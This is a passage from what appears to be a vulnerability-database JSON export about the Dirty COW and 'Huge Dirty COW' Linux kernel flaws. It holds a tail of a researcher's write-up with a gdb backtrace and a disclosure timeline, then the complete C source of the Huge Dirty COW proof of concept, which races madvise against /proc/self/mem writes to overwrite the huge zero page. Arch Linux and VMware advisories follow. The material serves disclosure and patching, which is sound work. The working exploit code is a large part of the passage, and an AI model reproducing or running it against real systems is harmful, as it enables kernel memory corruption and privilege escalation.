copy_name=copy_name@entry=false, \r\n address=<optimized out>, address@entry=24546262, ms_type=ms_type@entry=mst_file_text, bfd_section=<optimized out>, objfile=0x555557077860) at elfread.c:209\r\n#6 0x0000555555696ac6 in elf_symtab_read (reader=..., objfile=objfile@entry=0x555557077860, type=type@entry=0, number_of_symbols=number_of_symbols@entry=365691, \r\n symbol_table=symbol_table@entry=0x7ffff6a6d020, copy_names=copy_names@entry=false) at elfread.c:462\r\n#7 0x00005555556970c4 in elf_read_minimal_symbols (symfile_flags=<optimized out>, ei=0x7fffffffdcd0, objfile=0x555557077860) at elfread.c:1084\r\n#8 elf_symfile_read (objfile=0x555557077860, symfile_flags=...) at elfread.c:1194\r\n#9 0x000055555581f559 in read_symbols (objfile=objfile@entry=0x555557077860, add_flags=...) at symfile.c:861\r\n#10 0x000055555581f00b in syms_from_objfile_1 (add_flags=..., addrs=0x555557101b00, objfile=0x555557077860) at symfile.c:1062\r\n#11 syms_from_objfile (add_flags=..., addrs=0x555557101b00, objfile=0x555557077860) at symfile.c:1078\r\n#12 symbol_file_add_with_addrs (abfd=<optimized out>, name=name@entry=0x55555738c1d0 \"/opt/firefox/libxul.so\", add_flags=..., addrs=addrs@entry=0x555557101b00, flags=..., parent=parent@entry=0x0)\r\n at symfile.c:1177\r\n#13 0x000055555581f63d in symbol_file_add_from_bfd (abfd=<optimized out>, name=name@entry=0x55555738c1d0 \"/opt/firefox/libxul.so\", add_flags=..., addrs=addrs@entry=0x555557101b00, flags=..., \r\n parent=parent@entry=0x0) at symfile.c:1268\r\n#14 0x000055555580b256 in solib_read_symbols (so=so@entry=0x55555738bfc0, flags=...) at solib.c:712\r\n#15 0x000055555580be9b in solib_add (pattern=pattern@entry=0x0, from_tty=from_tty@entry=0, readsyms=1) at solib.c:1016\r\n#16 0x000055555580c678 in handle_solib_event () at solib.c:1301\r\n#17 0x00005555556f9db4 in bpstat_stop_status (aspace=0x555555ff5670, bp_addr=bp_addr@entry=140737351961185, ptid=..., ws=ws@entry=0x7fffffffe1d0) at breakpoint.c:5712\r\n#18 0x00005555557ad1ef in handle_signal_stop (ecs=0x7fffffffe1b0) at infrun.c:5963\r\n#19 0x00005555557aec8a in handle_inferior_event_1 (ecs=0x7fffffffe1b0) at infrun.c:5392\r\n#20 handle_inferior_event (ecs=ecs@entry=0x7fffffffe1b0) at infrun.c:5427\r\n#21 0x00005555557afd57 in fetch_inferior_event (client_data=<optimized out>) at infrun.c:3932\r\n#22 0x000055555576ade5 in gdb_wait_for_event (block=block@entry=0) at event-loop.c:859\r\n#23 0x000055555576aef7 in gdb_do_one_event () at event-loop.c:322\r\n#24 0x000055555576b095 in gdb_do_one_event () at ./common/common-exceptions.h:221\r\n#25 start_event_loop () at event-loop.c:371\r\n#26 0x00005555557c3938 in captured_command_loop (data=data@entry=0x0) at main.c:325\r\n#27 0x000055555576d243 in catch_errors (func=func@entry=0x5555557c3910 <captured_command_loop(void*)>, func_args=func_args@entry=0x0, errstring=errstring@entry=0x555555a035da \"\", \r\n mask=mask@entry=RETURN_MASK_ALL) at exceptions.c:236\r\n#28 0x00005555557c49ae in captured_main (data=<optimized out>) at main.c:1150\r\n#29 gdb_main (args=<optimized out>) at main.c:1160\r\n#30 0x00005555555ed628 in main (argc=<optimized out>, argv=<optimized out>) at gdb.c:32\r\n(gdb) list\r\n692 const struct demangled_name_entry *da\r\n693 = (const struct demangled_name_entry *) a;\r\n694 const struct demangled_name_entry *db\r\n695 = (const struct demangled_name_entry *) b;\r\n696 \r\n697 return strcmp (da->mangled, db->mangled) == 0;\r\n698 }\r\n699 \r\n700 /* Create the hash table used for demangled names. Each hash entry is\r\n701 a pair of strings; one for the mangled name and one for the demangled\r\n(gdb)\r\n```\r\n\r\nLink to our [POC](https://medium.com/r/?url=https%3A%2F%2Fgithub.com%2Fbindecy%2FHugeDirtyCowPOC)\r\n\r\n### Summary\r\nThis bug demonstrates the importance of patch auditing in the security development life-cycle. As the Dirty COW case and other [past cases](https://medium.com/r/?url=https%3A%2F%2Fsektioneins.de%2Fblog%2F16-09-05-pegasus-ios-kernel-vulnerability-explained-part-2.html) show, even hyped vulnerabilities may get incomplete patches. The situation is not reserved for closed source software only; open source software suffers just as much.\r\n\r\nFeel free to comment with any question or idea about the issue \r\n\r\n### Disclosure timeline\r\nThe initial report was on the 22.11.17 to the kernel and distros mailing lists. The response was immediate and professional with a [patch](https://medium.com/r/?url=https%3A%2F%2Fgithub.com%2Ftorvalds%2Flinux%2Fcommit%2Fa8f97366452ed491d13cf1e44241bc0b5740b1f0) ready in a few days. The patch fixes the touch_pmd function to set the dirty bit of the PMD entry only when the caller asks for write access.\r\n\r\nThanks to the Security team and the distros for their time and effort of maintaining a high standard of security.\r\n\r\n* 22.11.17\u200a\u2014\u200aInitial report to security@kernel.org and linux-distros@vs.openwall.org\r\n* 22.11.17\u200a\u2014\u200aCVE-2017\u20131000405 was assigned\r\n* 27.11.17\u200a\u2014\u200aPatch was committed to mainline kernel\r\n* 29.11.17\u200a\u2014\u200aPublic announcement", "published": "2017-11-30T00:00:00", "type": "seebug", "title": "\"Huge Dirty COW\" (CVE-2017\u20131000405)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2017-11-30T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96908", "id": "SSV:96908", "sourceData": "\n //\r\n// The Huge Dirty Cow POC. This program overwrites the system's huge zero page.\r\n// Compile with \"gcc -pthread main.c\"\r\n//\r\n// November 2017\r\n// Bindecy\r\n//\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h> \r\n#include <unistd.h> \r\n#include <sched.h>\r\n#include <string.h>\r\n#include <pthread.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h> \r\n\r\n#define MAP_BASE ((void *)0x4000000)\r\n#define MAP_SIZE (0x200000)\r\n#define MEMESET_VAL (0x41)\r\n#define PAGE_SIZE (0x1000)\r\n#define TRIES_PER_PAGE (20000000)\r\n\r\nstruct thread_args {\r\n char *thp_map;\r\n char *thp_chk_map;\r\n off_t off;\r\n char *buf_to_write;\r\n int stop;\r\n int mem_fd1;\r\n int mem_fd2;\r\n};\r\n\r\ntypedef void * (*pthread_proc)(void *);\r\n\r\nvoid *unmap_and_read_thread(struct thread_args *args) {\r\n char c;\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { \r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page.\r\n \r\n memcpy(&c, args->thp_map + args->off, sizeof(c));\r\n read(args->mem_fd2, &c, sizeof(c));\r\n \r\n lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n usleep(10); // We placed the zero page and marked its PMD as dirty. \r\n // Give get_user_pages() another chance before madvise()-ing again.\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *write_thread(struct thread_args *args) {\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {\r\n lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail.\r\n write(args->mem_fd1, args->buf_to_write, PAGE_SIZE);\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *wait_for_success(struct thread_args *args) {\r\n while (args->thp_chk_map[args->off] != MEMESET_VAL) {\r\n madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED);\r\n sched_yield();\r\n }\r\n\r\n args->stop = 1;\r\n return NULL;\r\n}\r\n\r\nint main() {\r\n struct thread_args args;\r\n void *thp_chk_map_addr;\r\n int ret;\r\n\r\n // Mapping base should be a multiple of the THP size, so we can work with the whole huge page.\r\n args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n if (args.thp_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n return -1;\r\n }\r\n if (args.thp_map != MAP_BASE) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the vulnerable mapping.\\n\");\r\n goto err_unmap1;\r\n }\r\n \r\n printf(\"[*] The beginning of the zero huge page: %lx\\n\", *(unsigned long *)args.thp_map);\r\n\r\n thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge\r\n args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); \r\n if (args.thp_chk_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n goto err_unmap1;\r\n }\r\n if (args.thp_chk_map != thp_chk_map_addr) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the check mapping.\\n\");\r\n goto err_unmap2;\r\n }\r\n \r\n ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); \r\n ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE);\r\n if (ret) {\r\n perror(\"[!] madvise()\");\r\n goto err_unmap2;\r\n }\r\n\r\n args.buf_to_write = malloc(PAGE_SIZE);\r\n if (!args.buf_to_write) {\r\n perror(\"[!] malloc()\");\r\n goto err_unmap2;\r\n }\r\n memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE);\r\n \r\n args.mem_fd1 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd1 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_free;\r\n }\r\n \r\n args.mem_fd2 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd2 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_close1;\r\n }\r\n\r\n printf(\"[*] Racing. Gonna take a while...\\n\");\r\n args.off = 0;\r\n\r\n // Overwrite every single page\r\n while (args.off < MAP_SIZE) { \r\n pthread_t threads[3]; \r\n args.stop = 0;\r\n \r\n ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args);\r\n ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args);\r\n ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args);\r\n \r\n if (ret) {\r\n perror(\"[!] pthread_create()\");\r\n goto err_close2;\r\n }\r\n \r\n pthread_join(threads[0], NULL); // This call will return only after the overwriting is done\r\n pthread_join(threads[1], NULL);\r\n pthread_join(threads[2], NULL);\r\n\r\n args.off += PAGE_SIZE; \r\n printf(\"[*] Done 0x%lx bytes\\n\", args.off);\r\n }\r\n \r\n printf(\"[*] Success!\\n\");\r\n \r\nerr_close2:\r\n close(args.mem_fd2);\r\nerr_close1:\r\n close(args.mem_fd1);\r\nerr_free:\r\n free(args.buf_to_write);\r\nerr_unmap2:\r\n munmap(args.thp_chk_map, MAP_SIZE);\r\nerr_unmap1:\r\n munmap(args.thp_map, MAP_SIZE);\r\n \r\n if (ret) {\r\n fprintf(stderr, \"[!] Exploit failed.\\n\");\r\n }\r\n \r\n return ret;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96908", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "Arch Linux Security Advisory ASA-201610-16\n==========================================\n\nSeverity: High\nDate : 2016-10-24\nCVE-ID : CVE-2016-5195\nPackage : linux-grsec\nType : privilege escalation\nRemote : No\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package linux-grsec before version 1:4.7.10.r201610222037-1 is\nvulnerable to privilege escalation.\n\nResolution\n==========\n\nUpgrade to 1:4.7.10.r201610222037-1.\n\n# pacman -Syu \"linux-grsec>=1:4.7.10.r201610222037-1\"\n\nThe problem has been fixed upstream in version 4.7.10.r201610222037.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private read-only\nmemory mappings. An unprivileged local user could use this flaw to gain\nwrite access to otherwise read-only memory mappings and thus increase\ntheir privileges on the system.\n\nImpact\n======\n\nAn unprivileged local attacker is able to elevate their privileges on\nthe system and gain root access.\n\nReferences\n==========\n\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1384344\nhttps://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails\nhttps://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619\nhttps://access.redhat.com/security/cve/CVE-2016-5195", "modified": "2016-10-24T00:00:00", "published": "2016-10-24T00:00:00", "id": "ASA-201610-16", "href": "https://security.archlinux.org/ASA-201610-16", "type": "archlinux", "title": "[ASA-201610-16] linux-grsec: privilege escalation", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2019-11-06T16:05:28", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "**a. Local privilege escalation vulnerability in Linux kernel \n**\n\nThe Linux kernel which ships with the base operating system of VMware Appliances contains a race condition in the way its memory subsystem handles copy-on-write (aka \u201cDirty COW\u201d). Successful exploitation of the vulnerability may allow for local privilege escalation. The product lines listed in this advisory have been confirmed to be affected. VMware product lines that are not affected are documented in VMware [Knowledge Base article 2147515](<https://kb.vmware.com/kb/2147515>). \n\n\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifier CVE-2016-5195 to this issue. \n\nColumn 5 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. \n\n", "edition": 7, "modified": "2016-11-22T00:00:00", "published": "2016-11-09T00:00:00", "id": "VMSA-2016-0018", "href": "https://www.vmware.com/security/advisories/VMSA-2016-0018.html", "title": "VMware product updates address local privilege escalation vulnerability in Linux kernel", "type": "vmware", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}